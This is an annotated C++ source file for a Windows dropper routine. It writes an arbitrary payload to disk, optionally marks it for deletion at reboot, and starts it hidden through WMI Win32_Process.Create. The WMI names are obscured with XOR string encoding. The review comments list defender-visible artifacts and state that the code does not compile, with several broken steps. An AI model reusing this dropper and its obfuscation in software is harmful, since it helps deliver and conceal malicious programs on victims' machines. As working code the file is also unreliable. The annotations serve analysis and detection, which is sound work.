// WMICreateProcess.cpp : defines the entry point for the console application.
//
#define _WIN32_DCOM
#include <iostream>
using namespace std;
#include <comdef.h>
#include <Wbemidl.h>
# pragma comment(lib, "wbemuuid.lib")
// One "execute" action (action type = 1): a byte buffer that Execute() writes
// to a target path on disk and then launches through WMI (Win32_Process).
typedef struct _EXECUTE_ACTION //action type = 1
{
LPBYTE lpbPayload;      // bytes written verbatim to the file at wcTargetPath; NULL makes Execute() return FALSE
DWORD dwPayloadLen;     // size of lpbPayload in bytes; 0 makes Execute() return FALSE
WCHAR *wcTargetPath;    // destination path; %VAR% references are expanded before use; NULL makes Execute() return FALSE
BOOL bDeleteOnReboot;   // non-zero: the written file is scheduled for deletion at the next reboot (MoveFileEx)
INT iRunPayloadAs;      // not read anywhere in this file
} EXECUTE_ACTION, *PEXECUTE_ACTION;
// Expands %ENV% references in wcInString into a freshly HeapAlloc'd buffer
// returned through wcOutString. The caller owns the buffer and must release
// it with HeapFree(GetProcessHeap(), 0, ...).
//
// Caveats visible in this body:
//  - The HeapAlloc result is not checked; on failure wcOutString stays NULL
//    and the second ExpandEnvironmentStrings call receives NULL as its
//    destination buffer.
//  - A failed sizing call (dwSizeNeeded == 0) is not detected.
//  - The function unconditionally returns TRUE, so the return value carries
//    no error information; Execute() relies on the NULL check of wcOutString.
BOOL ExpandStrings(WCHAR *wcInString, WCHAR *&wcOutString)
{
wcOutString = NULL;
// First call with a zero-length destination only reports the size needed (in WCHARs, including the terminator).
DWORD dwSizeNeeded = ExpandEnvironmentStrings(wcInString, NULL, 0);
// Two extra WCHARs of slack beyond the reported size; the buffer is zero-filled.
wcOutString = (WCHAR *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (dwSizeNeeded + 2) * sizeof(WCHAR));
// Second call performs the expansion; its return value is ignored.
ExpandEnvironmentStrings(wcInString, wcOutString, dwSizeNeeded);
return TRUE;
}
// Writes peaExecute->lpbPayload to the (environment-expanded) target path,
// optionally schedules that file for deletion at next reboot, and then asks
// WMI (ROOT\CIMV2, Win32_Process.Create) to start it with a hidden window.
//
// Returns TRUE only when WMI ExecMethod succeeds; FALSE on a NULL/incomplete
// action, a failed path expansion, a failed CreateFile, or any failed COM/WMI
// step. The file write itself is never verified (see WriteFile below).
//
// Observable artifacts for defenders: a new file at the expanded target path
// (CREATE_ALWAYS overwrites an existing one); when bDeleteOnReboot is set, a
// delayed-delete entry that Windows records in the PendingFileRenameOperations
// value under Session Manager; and a process launched through WMI, which is
// typically logged in the WMI-Activity operational channel and runs with the
// WMI provider host rather than this program as its parent.
//
// The WMI class/method/property names are not used as written: each literal is
// rewritten in place by a running XOR chain before being passed to WMI, so the
// strings handed to the API differ from the literals in this source. Whether
// the literals here are plaintext or an already-encoded form cannot be told
// from this file alone.
//
// Cleanup is a chain of goto labels in reverse acquisition order; the labels
// below depend on exactly which resources exist at each jump. Note that the
// early jumps (`goto ret` after CreateFile and after CoInitializeEx) bypass
// later declarations that carry initializers (e.g. dwRWBytes, pLoc, the
// WCHAR name arrays); C++ forbids such jumps and MSVC rejects them (C2362),
// so this body does not compile as written.
BOOL Execute(PEXECUTE_ACTION peaExecute)
{
if (peaExecute == NULL) return FALSE;
// Reject an action that has no payload, no length or no destination path.
if (peaExecute->dwPayloadLen == 0
|| peaExecute->wcTargetPath == NULL
|| peaExecute->lpbPayload == NULL)
{
return FALSE;
}
BOOL bSuccess = FALSE;
WCHAR *wcExpandedPath = NULL;
// ExpandStrings always returns TRUE; failure is only visible as a NULL buffer.
ExpandStrings(peaExecute->wcTargetPath, wcExpandedPath);
if (wcExpandedPath == NULL) {
return FALSE;
}
// CREATE_ALWAYS: any existing file at this path is truncated and overwritten.
HANDLE hFile = CreateFile(wcExpandedPath,
GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
// Quoted command line for Win32_Process.Create. Allocated before the handle
// check so that `goto ret` can free it unconditionally; the HeapAlloc result is
// not checked, so wsprintf below can be handed NULL on allocation failure.
// +10 WCHARs of slack covers the two quotes and the terminator.
WCHAR *wcCommandExecute = (WCHAR *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
(wcslen(wcExpandedPath) + 10) * sizeof(WCHAR));
wsprintf(wcCommandExecute, L"\"%s\"", wcExpandedPath);
if (hFile == INVALID_HANDLE_VALUE) {
goto ret;
}
DWORD dwRWBytes = 0;
// Neither the WriteFile return value nor dwRWBytes is examined: a short or
// failed write still proceeds to launch whatever ended up on disk.
WriteFile(hFile, peaExecute->lpbPayload, peaExecute->dwPayloadLen, &dwRWBytes, NULL);
CloseHandle(hFile);
if (peaExecute->bDeleteOnReboot)
{
// "\\?\" prefix (4 WCHARs + terminator, within the +10 slack) so MoveFileEx
// gets an extended-length path. The MoveFileEx result is ignored; the
// delayed delete is a privileged operation and typically fails for a
// non-elevated caller.
WCHAR *wcCommandDelete = (WCHAR *)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, (wcslen(wcExpandedPath) + 10) * sizeof(WCHAR));
wsprintf(wcCommandDelete, L"\\\\?\\%s", wcExpandedPath);
MoveFileEx(wcCommandDelete, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
HeapFree(GetProcessHeap(), 0, wcCommandDelete);
}
// The expanded path is released here; the quoted copy in wcCommandExecute is
// what the WMI call uses from now on. The matching free at `ret` only matters
// for the early CreateFile-failure jump.
if (wcExpandedPath != NULL) HeapFree(GetProcessHeap(), 0, wcExpandedPath);
wcExpandedPath = NULL;
//finished writing - create process
HRESULT hr;
// COM is initialised per call and torn down at `uninit`; no
// CoInitializeSecurity call is made here (CoSetProxyBlanket on pSvc below
// is the only security setting applied).
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr)) goto ret;
IWbemLocator *pLoc = NULL;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER,
IID_IWbemLocator, (LPVOID *)&pLoc);
if (FAILED(hr)) goto uninit;
IWbemServices *pSvc = NULL;
// Local connection with the caller's own credentials (NULL user/password).
hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\CIMV2"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr)) goto relloc;
hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL,
RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
if (FAILED(hr)) goto relsvc;
// In-place XOR chain over the name literal (each element XORed with its
// predecessor, walking from the end, then a constant applied to element 0).
// The array passed to WMI is therefore not the literal shown here.
WCHAR wcMethodName[] = L"Create";
for (int i = 5; i > 0; i--){
wcMethodName[i] = wcMethodName[i - 1] ^ wcMethodName[i];
}
wcMethodName[0] = wcMethodName[0] ^ 0x76A2;
// Same transformation, different constant, for the class name.
WCHAR wcClassName[] = L"Win32_Process";
for (int i = 12; i > 0; i--) {
wcClassName[i] = wcClassName[i - 1] ^ wcClassName[i];
}
wcClassName[0] = wcClassName[0] ^ 0x3491;
// Same transformation for the startup-info class name.
WCHAR wcStartup[] = L"Win32_ProcessStartup";
for (int i = 19; i > 0; i--) {
wcStartup[i] = wcStartup[i - 1] ^ wcStartup[i];
}
wcStartup[0] = wcStartup[0] ^ 0x759A;
IWbemClassObject *pClass = NULL;
hr = pSvc->GetObjectW(wcClassName, 0, NULL, &pClass, NULL);
if (FAILED(hr)) goto relsvc;
IWbemClassObject* pStartupObject = NULL;
hr = pSvc->GetObject(wcStartup, 0, NULL, &pStartupObject, NULL);
if (FAILED(hr)) goto relclass;
IWbemClassObject* pStartupInstance = NULL;
hr = pStartupObject->SpawnInstance(0, &pStartupInstance);
if (FAILED(hr)) goto relobject;
//Create the values for the in parameters
// vt says VT_I2 (iVal) but the value is stored through intVal (the VT_INT
// member); the two share storage in the VARIANT union, so a VT_I2 reader sees
// the low 16 bits. SW_HIDE requests a hidden window for the new process.
VARIANT varParams;
VariantInit(&varParams);
varParams.vt = VT_I2;
varParams.intVal = SW_HIDE;
//Store the value for the in parameters
WCHAR wcShowWindow[] = L"ShowWindow";
for (int i = 9; i > 0; i--) {
wcShowWindow[i] = wcShowWindow[i - 1] ^ wcShowWindow[i];
}
wcShowWindow[0] = wcShowWindow[0] ^ 0x756E;
// Result of this Put is not checked; hr is overwritten by the next call.
hr = pStartupInstance->Put(wcShowWindow, 0, &varParams, 0);
IWbemClassObject* pInParamsDefinition = NULL;
hr = pClass->GetMethod(wcMethodName, 0, &pInParamsDefinition, NULL);
if (FAILED(hr)) goto relStartupInstance;
IWbemClassObject* pParamsInstance = NULL;
hr = pInParamsDefinition->SpawnInstance(0, &pParamsInstance);
if (FAILED(hr)) goto relParamDef;
//Construct Command
VariantClear(&varParams);
// bstrVal is pointed at a plain HeapAlloc'd WCHAR buffer, not a BSTR created
// with SysAllocString, so it lacks the length prefix a VT_BSTR consumer may
// read. NOTE(review): confirm the receiver tolerates this. varCommand is
// never passed to VariantClear, which avoids SysFreeString on that buffer.
VARIANT varCommand;
VariantInit(&varCommand);
varCommand.vt = VT_BSTR;
varCommand.bstrVal = wcCommandExecute;
WCHAR wcCommandLine[] = L"CommandLine";
for (int i = 10; i > 0; i--) {
wcCommandLine[i] = wcCommandLine[i - 1] ^ wcCommandLine[i];
}
wcCommandLine[0] = wcCommandLine[0] ^ 0x52DA;
//Store the value for the in parameters
// Put result not checked.
hr = pParamsInstance->Put(wcCommandLine, 0, &varCommand, 0);
// Reuse varCommand with a NULL BSTR for CurrentDirectory. Unlike the other
// names, this literal is passed to WMI untransformed; Put result not checked.
varCommand.vt = VT_BSTR;
varCommand.bstrVal = NULL;
WCHAR wcCurrentDirectory[] = L"CurrentDirectory";
//Store the value for the in parameters
hr = pParamsInstance->Put(wcCurrentDirectory, 0, &varCommand, 0);
//Store the value for the in parameters
// The startup instance is embedded via the generic byref member with
// vt = VT_DISPATCH; IWbemClassObject is not an IDispatch interface.
// NOTE(review): confirm the variant type/member pairing WMI expects here.
VARIANT vtDispatch;
VariantInit(&vtDispatch);
vtDispatch.vt = VT_DISPATCH;
vtDispatch.byref = pStartupInstance;
WCHAR wcProcessStartupInfo[] = L"ProcessStartupInformation";
// Unlike the other name arrays, the constant XOR on element 0 sits inside the
// loop body here and is therefore applied once per iteration (24 times).
for (int i = 24; i > 0; i--) {
wcProcessStartupInfo[i] = wcProcessStartupInfo[i - 1] ^ wcProcessStartupInfo[i]; wcProcessStartupInfo[0] = wcProcessStartupInfo[0] ^ 0x3D6A;
}
// Put result not checked.
hr = pParamsInstance->Put(wcProcessStartupInfo, 0, &vtDispatch, 0);
//Execute Method
// Invokes the class method through WMI; this is the step that creates the
// process. pOutParams (the return value / ProcessId) is released unread.
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(wcClassName, wcMethodName, 0, NULL, pParamsInstance, &pOutParams, NULL);
if (FAILED(hr)) goto relParamInst;
bSuccess = TRUE;
pOutParams->Release();
// Cleanup chain: each label releases one object and falls through to the
// next, in reverse order of acquisition. Jump targets above assume the
// objects released after them exist; do not reorder.
relParamInst:
pParamsInstance->Release();
relParamDef:
pInParamsDefinition->Release();
relStartupInstance:
pStartupInstance->Release();
relobject:
pStartupObject->Release();
relclass:
pClass->Release();
relsvc:
pSvc->Release();
relloc:
pLoc->Release();
uninit:
CoUninitialize();
ret:
// wcExpandedPath is already NULL on every path except the early
// CreateFile-failure jump; wcCommandExecute is allocated on all paths that
// reach here.
if (wcExpandedPath != NULL) HeapFree(GetProcessHeap(), 0, wcExpandedPath);
if (wcCommandExecute != NULL) HeapFree(GetProcessHeap(), 0, wcCommandExecute);
return bSuccess;
}
// Program entry point. As written this does not compile: Execute() takes a
// PEXECUTE_ACTION but is called with no argument, and the local action
// structure is declared but never initialised or passed. No payload, path
// or flags are set anywhere in this file.
int main()
{
_EXECUTE_ACTION ac; // declared, never initialised, never used
Execute(); // missing the required PEXECUTE_ACTION argument
}